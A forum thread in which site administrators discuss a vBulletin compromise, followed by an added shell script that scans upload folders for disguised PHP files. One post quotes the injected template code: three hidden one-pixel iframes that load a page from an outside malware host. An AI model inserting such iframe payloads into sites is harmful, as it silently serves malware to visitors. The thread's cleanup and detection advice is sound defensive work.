Iframe MYSQL Injection (http://centiyo.com/in.cgi?default)

  • #31
    On Linux, use this command:

    find /your_forum_dir/customprofilepics -name '*.php'
    find /your_forum_dir/attachments -name '*.php'

    If you find any .php, delete it.
    Thai Language Pack for vBulletin 4 | Thai Language Pack for vBulletin 3.8.X
    PaLungJit.com



    • #32
      ls -lR custom* | grep '\.php'
      ls -lR attachments | grep '\.php'

      Either works
      Sites I Run: Motorola Droid / Verizon Droid Forum, Nexus One Forum, iPhone News, Wii News & Wii Forum, HTC EVO Forum, iPad Forum, iPhone 4 Forum, Android Forum, Sprint Android Forum, AT&T Android Forum, T-Mobile Android Forum, Droid X Forum, HTC Incredible Forum.



      • #33
        Is there a way to modify the htaccess to tell 777 chmod directories like attachments, that only image files are accessible?

        I have found 2 php files in those folders as well and deleted them. I think they were in attachments and customprofilepics. Here is the code of the PHP file in case somebody can figure out what it's doing.

        Files were called: avatar103814_1.php & profilepic99214_1.php
        contents of avatar103814_1.php: (too long to post)



        • #34
          Originally posted by digijeff
          is there a way to modify the htaccess to tell 777 chmod directories like attachments, that only image files are accessible?
          Technically, yes.

          Make the script pass uploads through GD to determine if they are indeed images.

          How to do that, I wouldn't have the slightest clue.
          My Live vB5 Site - NZEating.com
          vBulletin Hosting | vBulletin Services - Need hosting for your vB? Need it installed? Something else? Let me take that hassle off your hands.



          • #35
            This just happened to me as well - I'm running the latest version of vbulletin 3.8 and vbseo. I have a feeling there's another injection point somewhere.

            Capture more registrations - Advanced Guest Posting & Registration
            Cell Phone Forums | Nikonites



            • #36
              I had this happen to me on Christmas day! But after logging in here and reading others' fixes I sorted it out. I found a custom avatar that was a PHP file rather than a gif. I deleted it. Upgraded VBSEO and the problem was gone.....until yesterday.

              Someone using Sophos said there was a trojan on the site, but no one else was saying anything and I had about 600 users online at the time who normally shout out at the tiniest thing wrong, so I ignored it. Then today someone else reported the same. So I started looking. First place I looked was the source of my index and there at the top was:

              <iframe width=1 height=1 border=0 frameborder=0 src=\"http://centiyo.com/in.cgi?default\"><iframe width=1 height=1 border=0 frameborder=0 src=\"http://centiyo.com/in.cgi?default\"><iframe width=1 height=1 border=0 frameborder=0 src=\"http://centiyo.com/in.cgi?default\">
              Seems like 3 instances of the same code. Once I remove it from the template the Sophos users are allowed back in. I am still using the latest VBSEO, latest VB etc, I checked avatars and customprofilepics and there seems to be no dodgy images, well none ending in PHP like last time.

              Three instances, does that mean some script will write it in my header every day?

              So how did this code get in my header?

              Thanks
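
The find and ls commands in #31 and #32 match on file name only. As an added example that is not part of the thread, the script below also checks file content in the upload directories, so a file named like an image but carrying PHP is reported too. The function names `scan_uploads` and `make_samples`, the list of PHP extensions and the sample files are assumptions made for the example.

```shell
#!/bin/sh
# Added example, not code from the thread. scan_uploads and make_samples are
# hypothetical names. Output is "TAG<TAB>path":
#   PHP-NAME  name has a PHP extension (any case, or doubled: x.php.gif)
#   PHP-TAG   content contains a PHP open tag, whatever the name says
#   MISMATCH  name says gif/jpg/png but the leading magic bytes disagree
scan_uploads() {
    find "$@" -type f -exec sh -c '
        for f do
            lc=$(printf "%s" "${f##*/}" | tr "[:upper:]" "[:lower:]")
            case "$lc" in
                *.php|*.php[0-9]|*.phtml|*.phar|*.php.*)
                    printf "PHP-NAME\t%s\n" "$f"; continue ;;
            esac
            if LC_ALL=C grep -aqiF "<?php" "$f"; then
                printf "PHP-TAG\t%s\n" "$f"; continue
            fi
            case "$lc" in
                *.gif)        want=47494638 ;;   # "GIF8"
                *.jpg|*.jpeg) want=ffd8ff ;;     # JPEG SOI marker
                *.png)        want=89504e47 ;;   # \x89 "PNG"
                *)            continue ;;        # not named as an image
            esac
            magic=$(od -An -tx1 -N4 "$f" | tr -d " \n")
            case "$magic" in
                "$want"*) ;;
                *) printf "MISMATCH\t%s\n" "$f" ;;
            esac
        done' sh {} +
}

# Constructed sample tree (placeholder contents) for trying the check offline.
make_samples() {
    d=$(mktemp -d) && mkdir "$d/customprofilepics" "$d/attachments" || return 1
    printf 'GIF89a\001\001' > "$d/customprofilepics/ok.gif"
    printf '<?php /* constructed */ ?>' > "$d/customprofilepics/avatar1_1.php"
    printf 'GIF89a<?php /* constructed */ ?>' > "$d/customprofilepics/avatar2_1.gif"
    printf 'plain text' > "$d/attachments/pic.PNG"
    printf '%s\n' "$d"
}

# Usage: sh scan.sh /your_forum_dir/customprofilepics /your_forum_dir/attachments
[ "$#" -eq 0 ] || scan_uploads "$@"
```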
